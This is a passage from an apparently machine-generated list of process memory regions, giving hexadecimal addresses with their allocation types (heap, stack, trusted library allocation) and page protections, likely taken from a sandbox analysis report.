|
trusted library allocation
|
page read and write
|
||
20566CD9000
|
trusted library allocation
|
page read and write
|
||
1CAD6489000
|
heap
|
page read and write
|
||
18726236000
|
heap
|
page read and write
|
||
20566BDC000
|
heap
|
page read and write
|
||
3994000
|
heap
|
page read and write
|
||
18810075000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1B9A7E81000
|
trusted library allocation
|
page read and write
|
||
18726228000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1667000
|
heap
|
page read and write
|
||
187262B2000
|
heap
|
page read and write
|
||
1CAD67E5000
|
heap
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
1360000
|
heap
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
14E4DF9E000
|
heap
|
page read and write
|
||
1B9A8325000
|
trusted library allocation
|
page read and write
|
||
18810210000
|
trusted library allocation
|
page read and write
|
||
7DA89FE000
|
stack
|
page read and write
|
||
2056BD18000
|
trusted library allocation
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
18810001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B450000
|
trusted library allocation
|
page read and write
|
||
1CAD67E1000
|
heap
|
page read and write
|
||
2056BE17000
|
trusted library allocation
|
page read and write
|
||
2056BB68000
|
heap
|
page read and write
|
||
1CAD6130000
|
trusted library allocation
|
page read and write
|
||
1479000
|
heap
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
205679D0000
|
heap
|
page read and write
|
||
3A5D000
|
heap
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
2056BBF2000
|
heap
|
page read and write
|
||
3DE3000
|
heap
|
page read and write
|
||
7FFD9B423000
|
trusted library allocation
|
page read and write
|
||
1CAD63AE000
|
heap
|
page read and write
|
||
1C2D41E0000
|
trusted library allocation
|
page read and write
|
||
3D6A000
|
heap
|
page read and write
|
||
1760C685000
|
trusted library allocation
|
page read and write
|
||
14E33CCA000
|
heap
|
page read and write
|
||
20567B78000
|
heap
|
page read and write
|
||
1880169B000
|
trusted library allocation
|
page read and write
|
||
1760CB3E000
|
trusted library allocation
|
page read and write
|
||
210C000
|
heap
|
page read and write
|
||
7FFD9B2E0000
|
trusted library allocation
|
page read and write
|
||
1A5E4CFC000
|
heap
|
page read and write
|
||
205679C3000
|
heap
|
page read and write
|
||
1CAD60D0000
|
trusted library allocation
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
7FFD9B2B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B500000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
1CAD63CF000
|
heap
|
page read and write
|
||
1CAD645E000
|
heap
|
page read and write
|
||
1887C7FA000
|
heap
|
page read and write
|
||
1CAD67E9000
|
heap
|
page read and write
|
||
7FFD9B0A3000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
1CAD8910000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
1CAD6801000
|
heap
|
page read and write
|
||
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
3DD7000
|
heap
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
380B000
|
heap
|
page read and write
|
||
18726223000
|
heap
|
page read and write
|
||
3968000
|
heap
|
page read and write
|
||
14E33D0D000
|
heap
|
page read and write
|
||
1CAD8910000
|
heap
|
page read and write
|
||
1881001D000
|
trusted library allocation
|
page read and write
|
||
1887C7AF000
|
heap
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
1C2D41A3000
|
trusted library allocation
|
page read and write
|
||
11CF000
|
stack
|
page read and write
|
||
20567140000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
20567B28000
|
heap
|
page read and write
|
||
7FFD9B1C0000
|
trusted library allocation
|
page execute and read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
14E33EA0000
|
trusted library allocation
|
page read and write
|
||
15A2000
|
heap
|
page read and write
|
||
1554000
|
heap
|
page read and write
|
||
1887E874000
|
heap
|
page read and write
|
||
834817E000
|
stack
|
page read and write
|
||
163D000
|
heap
|
page read and write
|
||
2CA47FE000
|
unkown
|
page readonly
|
||
2CA51FE000
|
unkown
|
page readonly
|
||
1B9A7E9B000
|
trusted library allocation
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
18800683000
|
trusted library allocation
|
page read and write
|
||
1FD65020000
|
heap
|
page read and write
|
||
1610000
|
heap
|
page read and write
|
||
1CAD6439000
|
heap
|
page read and write
|
||
11CE000
|
stack
|
page read and write
|
||
20567B1B000
|
heap
|
page read and write
|
||
1CAD88ED000
|
heap
|
page read and write
|
||
2056BC43000
|
heap
|
page read and write
|
||
7FFD9B350000
|
trusted library allocation
|
page read and write
|
||
2056BD22000
|
trusted library allocation
|
page read and write
|
||
1A5EA206000
|
trusted library allocation
|
page read and write
|
||
20566D18000
|
trusted library allocation
|
page read and write
|
||
1A5E5400000
|
heap
|
page read and write
|
||
20567B06000
|
heap
|
page read and write
|
||
2056798D000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567B7C000
|
heap
|
page read and write
|
||
834873E000
|
stack
|
page read and write
|
||
3E32000
|
heap
|
page read and write
|
||
18801489000
|
trusted library allocation
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BB5E000
|
heap
|
page read and write
|
||
7FFD9B444000
|
trusted library allocation
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
2056BE19000
|
trusted library allocation
|
page read and write
|
||
7FFD9B176000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B490000
|
trusted library allocation
|
page read and write
|
||
1760CB6E000
|
trusted library allocation
|
page read and write
|
||
1C2D5BB8000
|
heap
|
page read and write
|
||
2056BB56000
|
heap
|
page read and write
|
||
2CA5B7E000
|
stack
|
page read and write
|
||
20566D98000
|
trusted library allocation
|
page read and write
|
||
7FFD9B140000
|
trusted library allocation
|
page read and write
|
||
1A5E4C6E000
|
heap
|
page read and write
|
||
15C5000
|
heap
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
1CAD60D9000
|
trusted library allocation
|
page read and write
|
||
1CAD6472000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1760C773000
|
trusted library allocation
|
page read and write
|
||
397C000
|
heap
|
page read and write
|
||
7FFD9B280000
|
trusted library allocation
|
page execute and read and write
|
||
158A000
|
heap
|
page read and write
|
||
1CAD8D40000
|
trusted library allocation
|
page read and write
|
||
14E37E44000
|
trusted library allocation
|
page read and write
|
||
1B9A5D9E000
|
heap
|
page read and write
|
||
18726224000
|
heap
|
page read and write
|
||
1CAD8E33000
|
trusted library allocation
|
page read and write
|
||
7FFD9B290000
|
trusted library allocation
|
page read and write
|
||
1A5EA50F000
|
heap
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
1CAD8934000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
8348538000
|
stack
|
page read and write
|
||
20567B8A000
|
heap
|
page read and write
|
||
2100000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
14E4E0AB000
|
heap
|
page read and write
|
||
1CAD6510000
|
trusted library allocation
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
1CAD8908000
|
heap
|
page read and write
|
||
171000
|
unkown
|
page execute read
|
||
1CAD682E000
|
heap
|
page read and write
|
||
20567B8E000
|
heap
|
page read and write
|
||
1887EC21000
|
heap
|
page read and write
|
||
20567AD2000
|
heap
|
page read and write
|
||
2056BE30000
|
trusted library allocation
|
page execute
|
||
1760CB8A000
|
trusted library allocation
|
page read and write
|
||
1B9A5CE0000
|
heap
|
page read and write
|
||
20567B8D000
|
heap
|
page read and write
|
||
18726420000
|
heap
|
page read and write
|
||
20567B8A000
|
heap
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
1A5E5BC0000
|
trusted library section
|
page readonly
|
||
1C2D4234000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
7FFD9B270000
|
trusted library allocation
|
page execute and read and write
|
||
1887EBA8000
|
heap
|
page read and write
|
||
1760C671000
|
trusted library allocation
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
16B0000
|
heap
|
page read and write
|
||
1CAD63AC000
|
heap
|
page read and write
|
||
2CA4DFE000
|
unkown
|
page readonly
|
||
1CAD8E62000
|
trusted library allocation
|
page read and write
|
||
1A5EA2CA000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8E75000
|
trusted library allocation
|
page read and write
|
||
14E33E80000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1B9A5FD0000
|
heap
|
page read and write
|
||
20566BB0000
|
heap
|
page read and write
|
||
1760C787000
|
trusted library allocation
|
page read and write
|
||
1577000
|
heap
|
page execute and read and write
|
||
28A07F000
|
stack
|
page read and write
|
||
2056BB55000
|
heap
|
page read and write
|
||
1CAD8A38000
|
heap
|
page read and write
|
||
187262AB000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1B9A7F86000
|
trusted library allocation
|
page read and write
|
||
1B9A8382000
|
trusted library allocation
|
page read and write
|
||
14E45F1E000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
24640FE000
|
stack
|
page read and write
|
||
1CAD67CE000
|
heap
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
18726281000
|
heap
|
page read and write
|
||
24644FA000
|
stack
|
page read and write
|
||
1CAD67A0000
|
heap
|
page read and write
|
||
1887EBA5000
|
heap
|
page read and write
|
||
7FFD9B410000
|
trusted library allocation
|
page read and write
|
||
1CAD6487000
|
heap
|
page read and write
|
||
14E4DCA0000
|
heap
|
page execute and read and write
|
||
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
289FF8000
|
stack
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
1FD65256000
|
heap
|
page read and write
|
||
14E37EEA000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7DF486D70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B2C0000
|
trusted library allocation
|
page read and write
|
||
1872626C000
|
heap
|
page read and write
|
||
9EE7B1A000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20D000
|
unkown
|
page readonly
|
||
20567B1B000
|
heap
|
page read and write
|
||
1CAD680E000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
205679B3000
|
heap
|
page read and write
|
||
1B9A5FB0000
|
heap
|
page read and write
|
||
83485BE000
|
stack
|
page read and write
|
||
7FFD9B4E0000
|
trusted library allocation
|
page read and write
|
||
1CAD6472000
|
heap
|
page read and write
|
||
205679F6000
|
heap
|
page read and write
|
||
7FFD9B130000
|
trusted library allocation
|
page read and write
|
||
205679BA000
|
heap
|
page read and write
|
||
1760A7BA000
|
heap
|
page read and write
|
||
1B9A7D23000
|
heap
|
page read and write
|
||
2056ACE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B452000
|
trusted library allocation
|
page read and write
|
||
13F8000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567B26000
|
heap
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
2056BBFB000
|
heap
|
page read and write
|
||
205679B1000
|
heap
|
page read and write
|
||
1FD6504F000
|
heap
|
page read and write
|
||
2056BB55000
|
heap
|
page read and write
|
||
7FFD9B470000
|
trusted library allocation
|
page read and write
|
||
1B9A7FDD000
|
trusted library allocation
|
page read and write
|
||
18726298000
|
heap
|
page read and write
|
||
1A5E5402000
|
heap
|
page read and write
|
||
8347EFE000
|
stack
|
page read and write
|
||
157E000
|
heap
|
page read and write
|
||
7FFD9B0AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
2CA4FFE000
|
unkown
|
page readonly
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
1616000
|
heap
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
1872621B000
|
heap
|
page read and write
|
||
1720F7E000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD8E79000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
207A000
|
heap
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
1B9A7F8C000
|
trusted library allocation
|
page read and write
|
||
241000
|
unkown
|
page write copy
|
||
395C000
|
heap
|
page read and write
|
||
1A5EA250000
|
trusted library allocation
|
page read and write
|
||
1A5EA298000
|
trusted library allocation
|
page read and write
|
||
1B9A7670000
|
trusted library allocation
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
205679AA000
|
heap
|
page read and write
|
||
2056BC72000
|
heap
|
page read and write
|
||
11DC000
|
stack
|
page read and write
|
||
145A000
|
heap
|
page read and write
|
||
1CAD8AEC000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
14E35690000
|
heap
|
page read and write
|
||
20567B84000
|
heap
|
page read and write
|
||
1CAD6554000
|
trusted library allocation
|
page read and write
|
||
1C2D4390000
|
heap
|
page read and write
|
||
1CAD88FA000
|
heap
|
page read and write
|
||
1C2D4306000
|
heap
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1A5EA486000
|
heap
|
page read and write
|
||
1CAD6481000
|
heap
|
page read and write
|
||
18726223000
|
heap
|
page read and write
|
||
14E33CD0000
|
heap
|
page read and write
|
||
1FD64F86000
|
heap
|
page read and write
|
||
1CAD89C0000
|
heap
|
page read and write
|
||
1CAD6570000
|
trusted library allocation
|
page execute
|
||
20566D98000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD647E000
|
heap
|
page read and write
|
||
1CAD6800000
|
heap
|
page read and write
|
||
1A5EA290000
|
trusted library allocation
|
page read and write
|
||
1887C700000
|
heap
|
page read and write
|
||
1872621B000
|
heap
|
page read and write
|
||
1CAD6485000
|
heap
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
1CAD63B7000
|
heap
|
page read and write
|
||
20567B13000
|
heap
|
page read and write
|
||
15F1000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1A5EA1C5000
|
trusted library allocation
|
page read and write
|
||
2056BAF2000
|
heap
|
page read and write
|
||
1C2D424C000
|
heap
|
page read and write
|
||
1CAD63BD000
|
heap
|
page read and write
|
||
1CAD6433000
|
heap
|
page read and write
|
||
205679C8000
|
heap
|
page read and write
|
||
14E39223000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
20567B28000
|
heap
|
page read and write
|
||
1A5E5415000
|
heap
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
20567B88000
|
heap
|
page read and write
|
||
1B9A5CC0000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
15EF000
|
heap
|
page read and write
|
||
1CAD63B1000
|
heap
|
page read and write
|
||
1FD65026000
|
heap
|
page read and write
|
||
1721F4E000
|
stack
|
page read and write
|
||
1A5EA51B000
|
heap
|
page read and write
|
||
13D0000
|
heap
|
page read and write
|
||
1CAD8B20000
|
trusted library allocation
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
20567B2F000
|
heap
|
page read and write
|
||
1A5EA1D0000
|
trusted library allocation
|
page read and write
|
||
1CAD67E9000
|
heap
|
page read and write
|
||
289EF9000
|
stack
|
page read and write
|
||
20567B39000
|
heap
|
page read and write
|
||
1A5EA253000
|
trusted library allocation
|
page read and write
|
||
205679BE000
|
heap
|
page read and write
|
||
1887C9D0000
|
trusted library allocation
|
page read and write
|
||
20D000
|
unkown
|
page readonly
|
||
163F000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1FD64F50000
|
heap
|
page read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
1887E7B0000
|
heap
|
page execute and read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BC38000
|
heap
|
page read and write
|
||
1CAD8C18000
|
trusted library allocation
|
page read and write
|
||
1C2D4394000
|
heap
|
page read and write
|
||
205679CF000
|
heap
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
1B9A7F9A000
|
trusted library allocation
|
page read and write
|
||
245000
|
unkown
|
page readonly
|
||
7DF412521000
|
trusted library allocation
|
page execute read
|
||
188010B3000
|
trusted library allocation
|
page read and write
|
||
1A5EA350000
|
remote allocation
|
page read and write
|
||
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
20567990000
|
heap
|
page read and write
|
||
14E4DDC4000
|
heap
|
page read and write
|
||
1CAD60D5000
|
trusted library allocation
|
page read and write
|
||
1667000
|
heap
|
page read and write
|
||
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
1872620E000
|
heap
|
page read and write
|
||
15F7000
|
heap
|
page read and write
|
||
1A5E4C89000
|
heap
|
page read and write
|
||
1720EFE000
|
stack
|
page read and write
|
||
14E360D7000
|
trusted library allocation
|
page read and write
|
||
1CAD6806000
|
heap
|
page read and write
|
||
289C7E000
|
stack
|
page read and write
|
||
1B9A5DA3000
|
heap
|
page read and write
|
||
1CAD8B10000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
20567ACD000
|
heap
|
page read and write
|
||
2CA4EFC000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B3C0000
|
trusted library allocation
|
page read and write
|
||
1FD64FD5000
|
heap
|
page read and write
|
||
1CAD6475000
|
heap
|
page read and write
|
||
7FFD9B449000
|
trusted library allocation
|
page read and write
|
||
7FFD9B240000
|
trusted library allocation
|
page execute and read and write
|
||
20566D68000
|
trusted library allocation
|
page read and write
|
||
18726213000
|
heap
|
page read and write
|
||
1760C6F4000
|
trusted library allocation
|
page read and write
|
||
A9A000
|
stack
|
page read and write
|
||
1CAD8C0F000
|
trusted library allocation
|
page read and write
|
||
8348379000
|
stack
|
page read and write
|
||
2056BBF7000
|
heap
|
page read and write
|
||
1618000
|
heap
|
page read and write
|
||
3E3A000
|
heap
|
page read and write
|
||
20567B28000
|
heap
|
page read and write
|
||
20567990000
|
heap
|
page read and write
|
||
14E35C20000
|
heap
|
page execute and read and write
|
||
205679C3000
|
heap
|
page read and write
|
||
1887CA70000
|
heap
|
page execute and read and write
|
||
20566CB8000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679A2000
|
heap
|
page read and write
|
||
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
2056BC60000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B360000
|
trusted library allocation
|
page read and write
|
||
246473E000
|
stack
|
page read and write
|
||
171000
|
unkown
|
page execute read
|
||
205679C7000
|
heap
|
page read and write
|
||
1FD65250000
|
heap
|
page read and write
|
||
3990000
|
heap
|
page read and write
|
||
14E4E05A000
|
heap
|
page read and write
|
||
20566D40000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
187262BA000
|
heap
|
page read and write
|
||
1CAD682F000
|
heap
|
page read and write
|
||
14E4DE06000
|
heap
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
15CD000
|
heap
|
page read and write
|
||
7DA8BFE000
|
stack
|
page read and write
|
||
205E000
|
stack
|
page read and write
|
||
1FD64F5D000
|
heap
|
page read and write
|
||
1FD65017000
|
heap
|
page read and write
|
||
14E33C80000
|
heap
|
page read and write
|
||
2056BB5D000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
155D000
|
heap
|
page read and write
|
||
1FD6504D000
|
heap
|
page read and write
|
||
1667000
|
heap
|
page read and write
|
||
1A5E5BE0000
|
trusted library section
|
page readonly
|
||
2056ACE5000
|
trusted library allocation
|
page read and write
|
||
1CAD89D3000
|
heap
|
page read and write
|
||
7FFD9B45C000
|
trusted library allocation
|
page read and write
|
||
1C2D43EE000
|
heap
|
page read and write
|
||
1B9A7D7B000
|
heap
|
page read and write
|
||
7FFD9B320000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD63C6000
|
heap
|
page read and write
|
||
246483E000
|
stack
|
page read and write
|
||
7FFD9B2C0000
|
trusted library allocation
|
page read and write
|
||
1CAD8F80000
|
heap
|
page read and write
|
||
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
1760C77C000
|
trusted library allocation
|
page read and write
|
||
20567B13000
|
heap
|
page read and write
|
||
1CAD641A000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056C1D3000
|
trusted library allocation
|
page read and write
|
||
1CAD67F7000
|
heap
|
page read and write
|
||
1CAD8E66000
|
trusted library allocation
|
page read and write
|
||
2056BB35000
|
heap
|
page read and write
|
||
7FFD9B510000
|
trusted library allocation
|
page read and write
|
||
1887E660000
|
heap
|
page read and write
|
||
2056BDB0000
|
trusted library allocation
|
page read and write
|
||
1FD65017000
|
heap
|
page read and write
|
||
20567989000
|
heap
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
7FFD9B480000
|
trusted library allocation
|
page read and write
|
||
1CAD8BE0000
|
heap
|
page read and write
|
||
25E0679000
|
stack
|
page read and write
|
||
1CAD614D000
|
trusted library allocation
|
page read and write
|
||
1CAD8912000
|
heap
|
page read and write
|
||
7FFD9B0DC000
|
trusted library allocation
|
page execute and read and write
|
||
205679D0000
|
heap
|
page read and write
|
||
1887CA10000
|
trusted library allocation
|
page read and write
|
||
1CAD8910000
|
heap
|
page read and write
|
||
1CAD63B8000
|
heap
|
page read and write
|
||
1CAD8C0B000
|
trusted library allocation
|
page read and write
|
||
1887C7B5000
|
heap
|
page read and write
|
||
188006BF000
|
trusted library allocation
|
page read and write
|
||
2056ACF5000
|
trusted library allocation
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
1760A770000
|
heap
|
page read and write
|
||
176248F7000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD8E71000
|
trusted library allocation
|
page read and write
|
||
2CA4AFB000
|
stack
|
page read and write
|
||
1A5E4BD0000
|
heap
|
page read and write
|
||
2056BC6D000
|
heap
|
page read and write
|
||
1887C7B1000
|
heap
|
page read and write
|
||
1A5EA502000
|
heap
|
page read and write
|
||
20567B50000
|
heap
|
page read and write
|
||
1CAD6489000
|
heap
|
page read and write
|
||
1762488C000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
231000
|
unkown
|
page readonly
|
||
1C2D5BB5000
|
heap
|
page read and write
|
||
7FFD9B2F0000
|
trusted library allocation
|
page read and write
|
||
1872629B000
|
heap
|
page read and write
|
||
1CAD6800000
|
heap
|
page read and write
|
||
1CAD8B20000
|
trusted library allocation
|
page read and write
|
||
2056ACA0000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1CAD6552000
|
trusted library allocation
|
page read and write
|
||
7FFD9B300000
|
trusted library allocation
|
page read and write
|
||
3E10000
|
direct allocation
|
page read and write
|
||
1CAD8A35000
|
heap
|
page read and write
|
||
1B9BFF9C000
|
heap
|
page read and write
|
||
1CAD63B3000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1B9A834C000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1A5EA4EC000
|
heap
|
page read and write
|
||
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
1CAD6490000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
17212F9000
|
stack
|
page read and write
|
||
14E37EF3000
|
trusted library allocation
|
page read and write
|
||
20567B88000
|
heap
|
page read and write
|
||
205679A5000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1CAD60F9000
|
trusted library allocation
|
page read and write
|
||
1CAD88F2000
|
heap
|
page read and write
|
||
135E000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1887C754000
|
heap
|
page read and write
|
||
11FF000
|
stack
|
page read and write
|
||
2056C280000
|
trusted library allocation
|
page read and write
|
||
18801188000
|
trusted library allocation
|
page read and write
|
||
20567AD5000
|
heap
|
page read and write
|
||
18726238000
|
heap
|
page read and write
|
||
1CAD8C1D000
|
trusted library allocation
|
page read and write
|
||
2056BC31000
|
heap
|
page read and write
|
||
1CAD890B000
|
heap
|
page read and write
|
||
1CAD8914000
|
heap
|
page read and write
|
||
1760CB15000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
1CAD6472000
|
heap
|
page read and write
|
||
7FFD9B250000
|
trusted library allocation
|
page execute and read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567B3C000
|
heap
|
page read and write
|
||
18726222000
|
heap
|
page read and write
|
||
1A5EA1FD000
|
trusted library allocation
|
page read and write
|
||
2056BC54000
|
heap
|
page read and write
|
||
20567B2F000
|
heap
|
page read and write
|
||
1A5EA350000
|
remote allocation
|
page read and write
|
||
7FFD9B262000
|
trusted library allocation
|
page read and write
|
||
20566E90000
|
heap
|
page read and write
|
||
1887EC4B000
|
heap
|
page read and write
|
||
205679F6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
2056BAF4000
|
heap
|
page read and write
|
||
20566CF0000
|
trusted library allocation
|
page read and write
|
||
1A5EA2B7000
|
trusted library allocation
|
page read and write
|
||
20567034000
|
heap
|
page read and write
|
||
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
2CA597E000
|
stack
|
page read and write
|
||
1872626A000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B390000
|
trusted library allocation
|
page read and write
|
||
1A5EB000000
|
heap
|
page read and write
|
||
7FFD9B250000
|
trusted library allocation
|
page execute and read and write
|
||
1580000
|
heap
|
page read and write
|
||
1A5EA280000
|
trusted library allocation
|
page read and write
|
||
1CAD8E68000
|
trusted library allocation
|
page read and write
|
||
1887C84F000
|
heap
|
page read and write
|
||
28A27C000
|
stack
|
page read and write
|
||
2056C200000
|
trusted library allocation
|
page read and write
|
||
205679CC000
|
heap
|
page read and write
|
||
2464075000
|
stack
|
page read and write
|
||
11EF000
|
stack
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
2056C100000
|
trusted library allocation
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1645000
|
heap
|
page read and write
|
||
163D000
|
heap
|
page read and write
|
||
187262B2000
|
heap
|
page read and write
|
||
7FFD9B350000
|
trusted library allocation
|
page read and write
|
||
20566BC9000
|
heap
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
1A5EA1A0000
|
trusted library allocation
|
page read and write
|
||
1872620D000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1760A650000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
7FFD9B0A2000
|
trusted library allocation
|
page read and write
|
||
20567B32000
|
heap
|
page read and write
|
||
1CAD89FF000
|
heap
|
page read and write
|
||
2056ACC9000
|
trusted library allocation
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
1761C6E4000
|
trusted library allocation
|
page read and write
|
||
2056C270000
|
trusted library allocation
|
page read and write
|
||
20567B24000
|
heap
|
page read and write
|
||
1CAD8C03000
|
trusted library allocation
|
page read and write
|
||
205679BF000
|
heap
|
page read and write
|
||
205679A5000
|
heap
|
page read and write
|
||
20567B1E000
|
heap
|
page read and write
|
||
1872629D000
|
heap
|
page read and write
|
||
20566D4D000
|
trusted library allocation
|
page read and write
|
||
1760A756000
|
heap
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
289892000
|
stack
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
20567B52000
|
heap
|
page read and write
|
||
205679C6000
|
heap
|
page read and write
|
||
1A5EA420000
|
heap
|
page read and write
|
||
1CAD6483000
|
heap
|
page read and write
|
||
2056798D000
|
heap
|
page read and write
|
||
205679C1000
|
heap
|
page read and write
|
||
205679C8000
|
heap
|
page read and write
|
||
1CAD6439000
|
heap
|
page read and write
|
||
1B9A7F8F000
|
trusted library allocation
|
page read and write
|
||
14E383BA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B08D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
